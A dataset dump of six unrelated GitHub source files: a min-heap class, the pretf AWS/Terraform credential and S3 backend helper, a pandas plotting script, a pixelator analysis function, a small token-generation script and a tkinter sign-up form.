+{"seq_id":"72135116643","text":"\"\"\" \nA min heap is an almost complete binary tree, \nfully filled up to the next-to-last level and \nwith all nodes as far to the left as possible on the last level.\nThe smallest element is the root of the tree and \nthe subtrees hold values greater than or equal to their parent.\n\"\"\"\n\nclass min_heap:\n    def __init__(self, tamanho=0):\n        self.tamanho = tamanho\n        self.heap = [None for i in range(self.tamanho+1)]\n        self.ultimo = -1\n\n    def insere(self, elemento):\n        self.ultimo = self.ultimo + 1\n        self.heap[self.ultimo] = elemento\n        self.subir(self.ultimo)\n\n    def remove(self):\n        maior = self.heap[0]\n        self.heap[0] = self.heap[self.ultimo]\n        self.ultimo = self.ultimo - 1\n        self.descer(0)\n        return maior\n\n    def obterMenor(self):\n        return self.heap[0]\n\n    def subir(self, filho):\n        pai = (filho - 1) // 2\n        if (pai >= 0): # parent is inside the heap\n            if (self.heap[filho] < self.heap[pai]): # swap parent and child\n                self.heap[filho], self.heap[pai] = self.heap[pai], self.heap[filho]\n                self.subir(pai)\n\n    def descer(self, pai):\n        filho = 2 * pai + 1\n        if (filho <= self.ultimo):\n            if (filho < self.ultimo):\n                if (self.heap[filho + 1] < self.heap[filho]):\n                    filho = filho + 1\n            if (self.heap[pai] > self.heap[filho]):\n                self.heap[filho], self.heap[pai] = self.heap[pai], self.heap[filho]\n                self.descer(filho)\n\n    def constroiHeapDescendo(self, arvore, heap):\n        \"\"\"\n        Builds the heap by descending from the root of the tree.\n        \"\"\"\n        if arvore is None:\n            return\n        else:\n            self.constroiHeapDescendo(arvore.esquerda, heap)\n            self.constroiHeapDescendo(arvore.direita, heap)\n            self.heap.append(arvore)\n\n    # def imprimeHeap(self, p):\n    #     if (p <= self.ultimo):\n    #         print(self.heap[p])\n    #         self.imprimeHeap(2 * p)\n    #         self.imprimeHeap(2 * p + 1)\n\n    def imprimeHeap(self):\n        i = 0\n        while i <= self.ultimo:\n            print(self.heap[i], end=\" \")\n            i = i + 1\n\n\nif __name__ == '__main__':\n    import heapq\n\n    print(\"Example 1\")\n    print(\"Python heapq\")\n    a = [10, 20, 30, 40, 50]\n    heapq.heapify(a)\n    print(a)\n    h = min_heap(10)\n    h.insere(10)\n    h.insere(20)\n    h.insere(30)\n    h.insere(40)\n    h.insere(50)\n    print(\"heap:\", end=\" \")\n    h.imprimeHeap()\n    print(\"\")\n    print(\"Minimum\")\n    print(f\"Smallest (without removing): {h.obterMenor()}\")\n    print(f\"Remove smallest: {h.remove()}\")\n    print(f\"Remove smallest: {h.remove()}\")\n    print(f\"Remove smallest: {h.remove()}\")\n    print(f\"Smallest (without removing): {h.obterMenor()}\")\n    print(\"heap:\", end=\" \")\n    h.imprimeHeap()\n\n    print(\"\\nExample 2\")\n    print(\"Python heapq\")\n    a = [1, 2, 4, 3, 9, 7, 8, 10, 14, 16, 50]\n    heapq.heapify(a)\n    print(a)\n    h = min_heap(11)\n    h.insere(1)\n    h.insere(2)\n    h.insere(4)\n    h.insere(3)\n    h.insere(9)\n    h.insere(7)\n    h.insere(8)\n    h.insere(10)\n    h.insere(14)\n    h.insere(16)\n    h.insere(50)\n    print(\"heap:\", end=\" \")\n    h.imprimeHeap()\n    print(\"\")\n    print(\"Minimum\")\n    print(f\"Smallest (without removing): {h.obterMenor()}\")\n    print(f\"Remove smallest: {h.remove()}\")\n    print(f\"Remove smallest: {h.remove()}\")\n    print(f\"Remove smallest: {h.remove()}\")\n    print(f\"Smallest (without removing): {h.obterMenor()}\")\n    print(\"heap:\", end=\" \")\n    h.imprimeHeap()\n","repo_name":"asantos2000/master-data-structures-algorithms","sub_path":"trees/min_heap.py","file_name":"min_heap.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"20423823767","text":"import json\nimport os\nfrom functools import lru_cache, wraps\nfrom threading import RLock\nfrom time import sleep\nfrom typing import Any, Callable, Optional\n\nfrom boto3 import Session\n\nfrom 
pretf.api import block, log\nfrom pretf.blocks import Block\n\ntry:\n import boto_source_profile_mfa\n\n use_boto_source_profile_mfa = True\nexcept ImportError:\n use_boto_source_profile_mfa = False\n\n\n# Use this lock on anything that might trigger an MFA prompt,\n# because otherwise it is possible for multiple threads to\n# prompt the user at the same time, resulting in confusing\n# and broken prompts for the user. This is a flaw in boto3.\nlock = RLock()\n\n\ndef locked(func: Callable) -> Callable:\n @wraps(func)\n def wrapped(*args: Any, **kwargs: Any) -> Any:\n with lock:\n return func(*args, **kwargs)\n\n return wrapped\n\n\n@locked\ndef _assume_role(session: Session, **kwargs: str) -> Session:\n\n for key, value in list(kwargs.items()):\n if not value:\n del kwargs[key]\n\n sts_client = session.client(\"sts\")\n response = sts_client.assume_role(**kwargs)\n creds = response[\"Credentials\"]\n\n return Session(\n aws_access_key_id=creds[\"AccessKeyId\"],\n aws_secret_access_key=creds[\"SecretAccessKey\"],\n aws_session_token=creds[\"SessionToken\"],\n )\n\n\n@locked\ndef _create_s3_backend(\n session: Session, bucket: str, table: str, region_name: str\n) -> None:\n\n # Prompt before creating anything.\n account_id = get_account_id(session)\n bucket_arn = _get_s3_bucket_arn(region_name, account_id, bucket)\n table_arn = _get_dynamodb_table_arn(region_name, account_id, table)\n log.ok(f\"backend: {bucket_arn}\")\n log.ok(f\"backend: {table_arn}\")\n if not log.accept(\"backend: create backend resources\"):\n log.bad(\"backend: not created\")\n raise SystemExit(1)\n\n # Use the S3 bucket and DynamoDB table name for the CloudFormation stack.\n if bucket == table:\n stack_name = bucket\n else:\n stack_name = f\"{bucket}-{table}\"\n stack_arn = _get_cloudformation_stack_arn(region_name, account_id, stack_name)\n log.ok(f\"backend: creating {stack_arn}\")\n\n # Create the stack.\n cloudformation_client = session.client(\"cloudformation\", region_name=region_name)\n cloudformation_client.create_stack(\n StackName=stack_name,\n ResourceTypes=[\"AWS::DynamoDB::Table\", \"AWS::S3::Bucket\"],\n TemplateBody=json.dumps(\n {\n \"Resources\": {\n \"Table\": {\n \"Type\": \"AWS::DynamoDB::Table\",\n \"Properties\": {\n \"TableName\": table,\n \"AttributeDefinitions\": [\n {\"AttributeName\": \"LockID\", \"AttributeType\": \"S\"}\n ],\n \"KeySchema\": [\n {\"AttributeName\": \"LockID\", \"KeyType\": \"HASH\"}\n ],\n \"BillingMode\": \"PAY_PER_REQUEST\",\n },\n },\n \"Bucket\": {\n \"Type\": \"AWS::S3::Bucket\",\n \"Properties\": {\n \"AccessControl\": \"Private\",\n \"BucketName\": bucket,\n \"VersioningConfiguration\": {\"Status\": \"Enabled\"},\n },\n },\n }\n }\n ),\n )\n\n # Wait for it to complete.\n log.ok(\"backend: please wait...\")\n while True:\n sleep(10)\n response = cloudformation_client.describe_stacks(StackName=stack_name)\n for stack in response[\"Stacks\"]:\n if stack[\"StackStatus\"] == \"CREATE_IN_PROGRESS\":\n pass\n elif stack[\"StackStatus\"] == \"CREATE_COMPLETE\":\n log.ok(\"backend: create complete\")\n return\n else:\n log.bad(f\"backend: {stack['StackStatus']}\")\n log.bad(f\"backend: {stack['StackStatusReason']}\")\n\n\ndef _get_cloudformation_stack_arn(\n region_name: str, account_id: str, stack_name: str\n) -> str:\n return f\"arn:aws:cloudformation:{region_name}:{account_id}:stack/{stack_name}\"\n\n\ndef _get_dynamodb_table_arn(region_name: str, account_id: str, table: str) -> str:\n return f\"arn:aws:dynamodb:{region_name}:{account_id}:{table}\"\n\n\ndef 
_get_s3_bucket_arn(region_name: str, account_id: str, bucket: str) -> str:\n return f\"arn:aws:s3:{region_name}:{account_id}:{bucket}\"\n\n\n@locked\ndef _get_s3_backend_status(\n session: Session, region_name: str, bucket: str, table: str\n) -> dict:\n\n s3_client = session.client(\"s3\")\n\n try:\n response = s3_client.get_bucket_versioning(Bucket=bucket)\n except s3_client.exceptions.NoSuchBucket:\n bucket_exists = False\n bucket_versioning_enabled = False\n else:\n bucket_exists = True\n bucket_versioning_enabled = response[\"Status\"] == \"Enabled\"\n\n dynamodb_client = session.client(\"dynamodb\", region_name=region_name)\n\n try:\n dynamodb_client.describe_table(TableName=table)\n except dynamodb_client.exceptions.ResourceNotFoundException:\n table_exists = False\n else:\n table_exists = True\n\n return {\n \"bucket_exists\": bucket_exists,\n \"bucket_versioning_enabled\": bucket_versioning_enabled,\n \"table_exists\": table_exists,\n }\n\n\ndef _profile_creds_definitely_supported_by_terraform(creds: Any) -> bool:\n if creds.method in (\"config-file\", \"shared-credentials-file\"):\n # The credentials were in the config file, so Terraform\n # will have no trouble finding them using the profile.\n return True\n else:\n # The credentials were more complicated, using the assume-role\n # provider, custom-process provider, or something else. Terraform\n # does not support as many credential types as Boto (e.g. Terraform\n # can't do MFA prompts) so we should remove the \"profile\" from the\n # configuration and expose the actual credentials to Terraform.\n return False\n\n\n@locked\ndef export_environment_variables(\n session: Optional[Session] = None,\n region_name: Optional[str] = None,\n **kwargs: Any,\n) -> None:\n \"\"\"\n Exports AWS credentials as environment variables.\n\n \"\"\"\n\n if session is None:\n session = get_session(**kwargs)\n\n creds = get_frozen_credentials(session)\n\n if creds.access_key:\n os.environ[\"AWS_ACCESS_KEY_ID\"] = creds.access_key\n\n if creds.secret_key:\n os.environ[\"AWS_SECRET_ACCESS_KEY\"] = creds.secret_key\n\n if creds.token:\n os.environ[\"AWS_SECURITY_TOKEN\"] = creds.token\n os.environ[\"AWS_SESSION_TOKEN\"] = creds.token\n\n if not region_name:\n region_name = session.region_name\n if region_name:\n os.environ[\"AWS_REGION\"] = region_name\n os.environ[\"AWS_DEFAULT_REGION\"] = region_name\n\n\n@lru_cache()\n@locked\ndef get_account_id(\n session: Optional[Session] = None,\n **kwargs: Any,\n) -> str:\n if session is None:\n session = get_session(**kwargs)\n sts_client = session.client(\"sts\")\n account_id = sts_client.get_caller_identity()[\"Account\"]\n return account_id\n\n\n@locked\ndef get_frozen_credentials(\n session: Optional[Session] = None,\n **kwargs: Any,\n) -> Any:\n if session is None:\n session = get_session(**kwargs)\n return session.get_credentials().get_frozen_credentials()\n\n\n@lru_cache()\ndef get_session(**kwargs: Any) -> Session:\n if use_boto_source_profile_mfa:\n return boto_source_profile_mfa.get_session(**kwargs)\n else:\n return Session(**kwargs)\n\n\n@locked\ndef provider_aws(**body: Any) -> Block:\n \"\"\"\n Returns an AWS provider block. 
If provided, the `profile` option\n    may be replaced with temporary credentials for that profile.\n\n    \"\"\"\n\n    if body.get(\"profile\"):\n        session = get_session(profile_name=body[\"profile\"])\n        creds = session.get_credentials()\n        if not _profile_creds_definitely_supported_by_terraform(creds):\n\n            # This profile is using credentials that Terraform may not\n            # support, so get static/frozen credentials and inject them\n            # into the configuration.\n\n            del body[\"profile\"]\n\n            frozen_creds = creds.get_frozen_credentials()\n            body[\"access_key\"] = frozen_creds.access_key\n            body[\"secret_key\"] = frozen_creds.secret_key\n            if creds.token:\n                body[\"token\"] = frozen_creds.token\n\n    return block(\"provider\", \"aws\", body)\n\n\n@locked\ndef terraform_backend_s3(bucket: str, dynamodb_table: str, **config: Any) -> Block:\n    \"\"\"\n    This ensures that the S3 backend exists, prompting to create it if\n    necessary, sets the credentials as environment variables in some\n    cases, and returns a Terraform configuration block for it.\n\n    \"\"\"\n\n    # Create a session from any AWS credentials options.\n\n    session_kwargs = {}\n    session_kwargs_map = {\n        \"profile\": \"profile_name\",\n        \"access_key\": \"aws_access_key_id\",\n        \"secret_key\": \"aws_secret_access_key\",\n        \"token\": \"aws_session_token\",\n    }\n    for config_key, session_key in session_kwargs_map.items():\n        config_value = config.get(config_key)\n        if config_value:\n            session_kwargs[session_key] = config[config_key]\n\n    session = get_session(**session_kwargs)\n\n    region = config.get(\"region\") or session.region_name\n\n    # Replace the profile argument with environment variables.\n\n    if config.get(\"profile\"):\n        creds = session.get_credentials()\n        if not _profile_creds_definitely_supported_by_terraform(creds):\n\n            # This profile is using credentials that Terraform may not\n            # support, so get static/frozen credentials and export them\n            # as environment variables.\n\n            # Use environment variables for credentials rather than\n            # injecting them into the backend configuration because\n            # Terraform gets confused when the backend configuration\n            # changes, which happens with certain AWS credential types\n            # such as assuming roles.\n\n            del config[\"profile\"]\n\n            export_environment_variables(session=session, region_name=region)\n\n    # Assume role before interacting with backend resources. This is not the same\n    # as profiles that assume roles. This is when Terraform has specifically\n    # been configured to assume a role. 
This is more likely to happen when\n # running Terraform on an EC2 instance using instance profile credentials,\n # or using environment variables to set credentials, and then assuming\n # different roles using those credentials.\n\n if config.get(\"role_arn\"):\n session = _assume_role(\n session,\n RoleArn=config[\"role_arn\"],\n RoleSessionName=config.get(\"session_name\", \"\"),\n ExternalId=config.get(\"external_id\", \"\"),\n )\n\n # Check if the backend resources have been created.\n\n status = _get_s3_backend_status(\n session=session, region_name=region, bucket=bucket, table=dynamodb_table\n )\n\n if not all(status.values()):\n\n if any(status.values()):\n\n log.bad(\"backend: incomplete backend setup\")\n\n account_id = get_account_id(session=session)\n bucket_arn = _get_s3_bucket_arn(region, account_id, bucket)\n table_arn = _get_dynamodb_table_arn(region, account_id, dynamodb_table)\n\n if status[\"bucket_exists\"]:\n log.ok(f\"backend: {bucket_arn} found\")\n else:\n log.bad(f\"backend: {bucket_arn} not found\")\n\n if status[\"bucket_versioning_enabled\"]:\n log.ok(f\"backend: {bucket_arn} versioning enabled\")\n else:\n log.bad(f\"backend: {bucket_arn} versioning disabled\")\n\n if status[\"table_exists\"]:\n log.ok(f\"backend: {table_arn} found\")\n else:\n log.bad(f\"backend: {table_arn} not found\")\n\n raise SystemExit(1)\n\n _create_s3_backend(\n session=session, bucket=bucket, table=dynamodb_table, region_name=region\n )\n\n # Return the configuration to use the backend.\n\n config[\"bucket\"] = bucket\n config.setdefault(\"encrypt\", True)\n config[\"dynamodb_table\"] = dynamodb_table\n config[\"region\"] = region\n\n return block(\"terraform\", {\"backend\": {\"s3\": config}})\n\n\n@locked\ndef terraform_remote_state_s3(name: str, **body: Any) -> Block:\n \"\"\"\n This returns a Terraform configuration block for a \"terraform_remote_state\"\n data source, with added support for AWS profiles using MFA prompts.\n\n \"\"\"\n\n body[\"backend\"] = \"s3\"\n config = body.get(\"config\", {})\n if config.get(\"profile\"):\n\n session = get_session(profile_name=config[\"profile\"])\n creds = session.get_credentials()\n if not _profile_creds_definitely_supported_by_terraform(creds):\n\n # This profile is using credentials that Terraform may not\n # support, so get static/frozen credentials and inject them\n # into the configuration.\n\n del config[\"profile\"]\n\n frozen_creds = creds.get_frozen_credentials()\n config[\"access_key\"] = frozen_creds.access_key\n config[\"secret_key\"] = frozen_creds.secret_key\n if creds.token:\n config[\"token\"] = frozen_creds.token\n\n return block(\"data\", \"terraform_remote_state\", name, body)\n","repo_name":"raymondbutcher/pretf","sub_path":"pretf.aws/pretf/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":13531,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"54"} +{"seq_id":"35513284620","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 3 21:51:27 2021\n\n@author: user\n\nSlope: https://www.engineeringtoolbox.com/slope-degrees-gradient-grade-d_1562.html\nAngle: https://arrayjson.com/numpy-angle/\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport time\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n#%% Set Crypto Values and Date increments\n\n# Crypto Value 1: Create 100 linear values and raise ^ 2\npower_val = [x**2 for x in np.linspace(0,5,100)]\n\n# Crypto Value 2: Create 100 linear values and raise ^ 2\npower_val2 = 
[x**2 for x in np.linspace(1,3,100)]\n\n# Date value ranging in 15 minute increments.\nfifteen_range = list(pd.date_range(start='1/1/2021',\n periods = 100,\n freq = '15min'))\n\n#%% Create DataFrame and columns\ndf = pd.DataFrame()\n\n# Create dataframe columns from the above values and date increments\ndf['power_val'] = power_val\ndf['power_val2'] = power_val2\ndf['15min_range'] = fifteen_range\n\n\n#%% Melt New DataFrame and plot in Seaborn\n\n# Create df two and melt the values into the date range.\n# Melting data is required to properly plot multiple data set on seaborn.\ndf_two = pd.melt(df, \n id_vars=['15min_range'], \n value_vars=['power_val','power_val2'])\n\n# Graph out a line plot with the melted DataFrame\nsns.lineplot(x = '15min_range', \n y ='value', \n hue = 'variable', \n data = df_two)\n\n#%% Display DataFrame and Query value crossover\n\n# For loop and output value columns and boolean comparison.\nfor x in range(len(df)):\n # if df['power_val'][x] == df['power_val2'][x]:\n # print('{},{},{}'.format('MATCH',\n # df['power_val'][x],\n # df['power_val2'][x]))\n # else:\n # pass\n print(df['power_val'][x],\n df['power_val2'][x], \n df['power_val'][x] < df['power_val2'][x])\n time.sleep(0.2)\n\n#%% Build function to show slope of each line\n \n# Find the X value and Y value\nX = df['15min_range'].iloc[-4:]\nY = df['power_val2'].iloc[-4:]\nZ = df['power_val'].iloc[-4:]\n\nx = [1,2,3,4]\ny = [1,2,3,4]\n\nsns.scatterplot(data=df, x='15min_range', y='power_val2')\n\n# Output a graph that shows 4 values of: time and powerval2\nplt.xticks(rotation=45)\nplt.scatter(df['15min_range'].iloc[-5:], df['power_val2'].iloc[-5:])\n\nprint('{} {}'.format(df['power_val2'].iloc[-4:].diff(),\n df['power_val2'].iloc[-4:]))\n\n#%% Solution for slope and degrees\n\"\"\"\nEach X increment in my graph is 15 minutes, which is equivilant to one time\nseries increment.\nSo....the X increment is always 1.\n\nY increment will be the difference of the Y Series (SEE: Series.diff())\nExample:\n \nY = df['power_val2'].iloc[-4:]\n\nY\nOut[84]: \n96 8.640037\n97 8.759208\n98 8.879196\n99 9.000000\nName: power_val2, dtype: float64\n\nY.diff()\nOut[85]: \n96 NaN\n97 0.119172\n98 0.119988\n99 0.120804\nName: power_val2, dtype: float64\n\nExample: np.angle(X + Yj, deg=True)\n\nnp.angle(1 + 0.119172j, deg=True)\nOut[110]: 6.795973881572169\n\nMy final thought for the night....I will use .diff() to find my Y value;\nassuming my .diff() default period will be 1, my X value will also be 1.\n\nOnce I have the .diff() value, I will use .angle() to output a degree.\n\nBoth the .diff() and the .angle() will be values for each row.\n \n\"\"\"\n\n\n\n\n\n","repo_name":"dervinfro/Examples","sub_path":"Example_Crypto_Values_Graph.py","file_name":"Example_Crypto_Values_Graph.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22448382260","text":"import json\nimport logging\nfrom dataclasses import asdict, dataclass\nfrom pathlib import Path\nfrom typing import Literal\n\nfrom anndata import AnnData\n\nfrom pixelator.analysis.colocalization import colocalization_scores\nfrom pixelator.analysis.colocalization.types import TransformationTypes\nfrom pixelator.analysis.polarization import polarization_scores\nfrom pixelator.pixeldataset import (\n PixelDataset,\n)\nfrom pixelator.utils import np_encoder\n\nlogger = logging.getLogger(__name__)\n\nPolarizationNormalizationTypes = Literal[\"raw\", \"clr\", 
\"denoise\"]\n\n\n@dataclass(frozen=True)\nclass AnalysisParameters:\n compute_polarization: bool\n compute_colocalization: bool\n use_full_bipartite: bool\n polarization_normalization: PolarizationNormalizationTypes\n polarization_binarization: bool\n colocalization_transformation: TransformationTypes\n colocalization_neighbourhood_size: int\n colocalization_n_permutations: int\n colocalization_min_region_count: int\n\n\ndef analyse_pixels(\n input: str,\n output: str,\n output_prefix: str,\n metrics_file: str,\n compute_polarization: bool,\n compute_colocalization: bool,\n use_full_bipartite: bool,\n polarization_normalization: Literal[\"raw\", \"clr\", \"denoise\"],\n polarization_binarization: bool,\n colocalization_transformation: TransformationTypes,\n colocalization_neighbourhood_size: int,\n colocalization_n_permutations: int,\n colocalization_min_region_count: int,\n verbose: bool,\n) -> None:\n \"\"\"\n This function takes a `PixelDataset` (zip) that has been generated\n with `pixelator annotate`. The function then uses the `edge list` and\n the `AnnData` to compute the scores (polarization, co-abundance and\n co-localization) which are then added to the `PixelDataset` (depending\n on which scores are enabled).\n\n :param input: the path to the PixelDataset (zip)\n :param output: the path to the output file\n :param output_prefix: the prefix to prepend to the output file\n :param metrics_file: the path to a JSON file to write metrics\n :param compute_polarization: compute polarization scores when True\n :param compute_colocalization: compute colocalization scores when True\n :param use_full_bipartite: use the bipartite graph instead of the\n one-node-projection (UPIA)\n :param polarization_normalization: the method to use to normalize the\n antibody counts (raw, clr or denoise)\n :param polarization_binarization: transform the counts to 0-1 when\n computing polarization scores\n :param colocalization_transformation: Select a transformation method to use\n for the colocalization\n :param colocalization_neighbourhood_size: Set the size of the neighbourhood to\n consider when computing the colocalization\n :param colocalization_n_permutations: Select number of permutations used to\n calculate empirical p-values of the\n colocalization values\n :param colocalization_min_region_count: The minimum size of the region (e.g. 
number\n                                            of counts in the neighbourhood) required\n                                            for it to be considered\n    :param verbose: run in verbose mode when true\n    :returns: None\n    :raises AssertionError: the input arguments are not valid\n    \"\"\"\n    logger.debug(\"Parsing PixelDataset from %s\", input)\n\n    # load the PixelDataset\n    dataset = PixelDataset.from_file(input)\n    edgelist = dataset.edgelist\n    adata: AnnData = dataset.adata\n\n    # get control antibodies\n    antibody_control = adata.var[adata.var[\"control\"]].index.to_list()\n    if polarization_normalization == \"denoise\" and len(antibody_control) == 0:\n        raise AssertionError(\n            \"normalization method is 'denoise' but the list of control antibodies is\"\n            \" empty\"\n        )\n    logger.debug(\"Loaded %s control antibodies\", \",\".join(antibody_control))\n\n    if len(antibody_control) == 0:\n        antibody_control = None\n\n    metrics = {}  # type: ignore\n    metrics[\"polarization\"] = \"yes\" if compute_polarization else \"no\"\n    metrics[\"colocalization\"] = \"yes\" if compute_colocalization else \"no\"\n    metrics[\"denoise\"] = \"yes\" if polarization_normalization == \"denoise\" else \"no\"\n    metrics[\"antibody_control\"] = antibody_control\n\n    # polarization scores\n    if compute_polarization:\n        # obtain polarization scores\n        scores = polarization_scores(\n            edgelist=edgelist,\n            use_full_bipartite=use_full_bipartite,\n            normalization=polarization_normalization,\n            antibody_control=antibody_control,\n            binarization=polarization_binarization,\n        )\n        dataset.polarization = scores\n\n    # colocalization scores\n    if compute_colocalization:\n        # obtain colocalization scores\n        scores = colocalization_scores(\n            edgelist=edgelist,\n            use_full_bipartite=use_full_bipartite,\n            transformation=colocalization_transformation,\n            neighbourhood_size=colocalization_neighbourhood_size,\n            n_permutations=colocalization_n_permutations,\n            min_region_count=colocalization_min_region_count,\n        )\n        dataset.colocalization = scores\n\n    dataset.metadata[\"analysis\"] = {\n        \"params\": asdict(\n            AnalysisParameters(\n                compute_colocalization=compute_colocalization,\n                compute_polarization=compute_polarization,\n                use_full_bipartite=use_full_bipartite,\n                polarization_normalization=polarization_normalization,\n                polarization_binarization=polarization_binarization,\n                colocalization_transformation=colocalization_transformation,\n                colocalization_neighbourhood_size=colocalization_neighbourhood_size,\n                colocalization_n_permutations=colocalization_n_permutations,\n                colocalization_min_region_count=colocalization_min_region_count,\n            )\n        )\n    }\n    # save dataset\n    dataset.save(str(Path(output) / f\"{output_prefix}.dataset.pxl\"))\n\n    # save metrics (JSON)\n    with open(metrics_file, \"w\") as outfile:\n        json.dump(metrics, outfile, default=np_encoder)\n","repo_name":"PixelgenTechnologies/pixelator","sub_path":"src/pixelator/analysis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"}
+{"seq_id":"25953124150","text":"import hashlib\nimport time\n\n__author__ = 'victor'\n\nnow = int(time.time())\ntext = str(now)+'testkeychangeme'\ntoken = hashlib.sha256(text.encode('utf8')).hexdigest()\nprint(now)\n\nprint('?token=%s&timestamp=%s' % (token, now))\n","repo_name":"victorhaggqvist/ledman","sub_path":"testkeys.py","file_name":"testkeys.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"37237867760","text":"\r\nfrom ctypes import 
alignment\r\nfrom tkinter import*\r\nfrom PIL import Image,ImageTk # to deal with jpg files in python\r\nclass Register:\r\n    def __init__(self,root):\r\n        self.root=root\r\n        self.root.title(\"Sign up page\") \r\n        self.root.geometry(\"1500x1000\")\r\n        \r\n        self.root.config(bg=\"#1FC2CC\") \r\n        \r\n        img=Image.open(r\"C:\\Users\\ASUS\\.spyder-py3\\signup\\images\\file1.jpg\")\r\n        img=img.resize((150,50),Image.ANTIALIAS)\r\n        \r\n        \r\n        self.up=ImageTk.PhotoImage(img)\r\n        up=Label(self.root,image=self.up,bg=\"white\").place(x=0,y=0,width=150,height=50) \r\n        \r\n        frame2=Frame(self.root,bg=\"white\")\r\n        frame2.place(x=150,y=0,width=1400,height=50)\r\n        \r\n        hbtn=Button(frame2, text=\"HOME\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n        hbtn.place(x=650,y=0,width=50,height=20)\r\n        \r\n        hbtn=Button(frame2, text=\"SEMINAR\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n        hbtn.place(x=800,y=0,width=90,height=20)\r\n        \r\n        hbtn=Button(frame2, text=\"INFORMATION\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n        hbtn.place(x=790,y=30,width=120,height=20)\r\n        \r\n        dbtn=Button(frame2, text=\"DASHBOARD\",bg=\"white\",fg=\"blue\" ,bd=0,activeforeground=\"white\",activebackground=\"white\",relief=RAISED,font=\"arial 12 bold\")\r\n        dbtn.place(x=1000,y=0,width=120,height=20)\r\n        \r\n        \r\n        frame1=Frame(self.root,bg=\"#1FC2CC\")\r\n        frame1.place(x=0,y=50,width=800,height=950)\r\n        title=Label(frame1,text=\"SIGN UP FORM\",font=(\"times new roman\",20,\"bold\"),bg=\"white\",fg=\"black\").place(x=400,y=50)\r\n        \r\n        img1=Image.open(r\"C:\\Users\\ASUS\\.spyder-py3\\signup\\images\\side.jpg\")\r\n        img1=img1.resize((700,950),Image.ANTIALIAS)\r\n        \r\n        self.right=ImageTk.PhotoImage(img1)\r\n        right=Label(self.root,image=self.right).place(x=950,y=50,width=700,height=900)\r\n        \r\n        name=Label(frame1,text=\"Name\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=100)\r\n        \r\n        txt_fname=Entry(frame1,font=(\"times new roman\",18),bg=\"white\").place(x=290,y=100,width=1000)\r\n        \r\n        gender=Label(frame1,text=\"Gender\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=150)\r\n        var1 = IntVar()\r\n        radiobtn1=Radiobutton(frame1,text=\"Male\",variable =var1,value=1,font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=290,y=150)\r\n        radiobtn2=Radiobutton(frame1,text=\"Female\",variable =var1,value=2,font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=490,y=150)\r\n        \r\n        #radio button frame2\r\n        \r\n        frame3=Frame(self.root,bg=\"#1FC2CC\")\r\n        frame3.place(x=0,y=250,width=700,height=40)\r\n        var2 = IntVar()\r\n        ms=Label(frame3,text=\"Marital Status\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=5)\r\n        radiobtn3=Radiobutton(frame3,text=\"Married\",variable =var2,value=3,font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=290,y=5)\r\n        radiobtn4=Radiobutton(frame3,text=\"Unmarried\",variable =var2,value=4,font=(\"times new roman\",15,\"bold\"),fg=\"black\").place(x=490,y=5)\r\n        \r\n        email=Label(frame1,text=\"Email Id\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=260)\r\n        txt_email=Entry(frame1,font=(\"times new roman\",18),bg=\"white\").place(x=290,y=260,width=1000) \r\n        \r\n        adress=Label(frame1,text=\"Address\",font=(\"times new 
roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=310)\r\n txt_adress=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=310,width=1000)\r\n \r\n organization=Label(frame1,text=\"Organization\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=360)\r\n txt_org=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=360,width=1000)\r\n \r\n designation=Label(frame1,text=\"Designation\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=410)\r\n txt_desg=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=410,width=1000)\r\n \r\n dob=Label(frame1,text=\"DOB\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=460)\r\n txt_dob=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=460,width=1000)\r\n \r\n mobile_no=Label(frame1,text=\"Mobile No.\",font=(\"times new roman\",18,\"bold\"),bg=\"#1FC2CC\",fg=\"black\").place(x=100,y=510)\r\n txt_mobile_no=Entry(frame1,font=(\"times new roman\",18,),bg=\"white\").place(x=290,y=510,width=1000)\r\n \r\n \r\n img_button=Button(frame1,text=\"Take Image\",font=(\"times new roman\",18,\"bold\"),bd=0,bg=\"white\",fg=\"black\").place(x=290,y=560)\r\n \r\n sub_button=Button(frame1,text=\"Submit\",font=(\"times new roman\",18,\"bold\"),bd=0,bg=\"white\",fg=\"blue\").place(x=590,y=560)\r\n \r\n #self.bg is obj of class\r\n \r\n 